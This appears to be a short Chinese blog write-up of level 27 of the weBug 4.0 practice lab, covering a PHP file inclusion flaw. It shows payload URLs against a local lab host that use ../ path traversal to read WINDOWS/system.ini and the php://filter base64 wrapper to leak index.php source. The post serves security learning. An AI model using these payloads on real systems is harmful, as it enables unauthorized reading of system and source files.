美文网首页
weBug 4.0 第27关 文件包含漏洞

weBug 4.0 第27关 文件包含漏洞

作者: gelinlang | 来源:发表于2019-04-11 22:13 被阅读0次

    可以看到url如下,明显的文件包含,直接读取文件。

    http://192.168.43.147/control/more/file_include.php?filename=../../template/dom_xss.html
    

    直接payload,写这么多../是为了到达c盘根目录。

    http://192.168.43.147/control/more/file_include.php?filename=../../../../../../WINDOWS/system.ini
    

    还可以用php伪协议读取文件源码,比如WWW目录下的index.php

    http://192.168.43.147/control/more/file_include.php?filename=php://filter/read=convert.base64-encode/resource=../../index.php
    

    将得到base64字符串,解码得到index.php源码

    相关文章

      网友评论

          本文标题:weBug 4.0 第27关 文件包含漏洞

          本文链接:https://www.haomeiwen.com/subject/etrfwqtx.html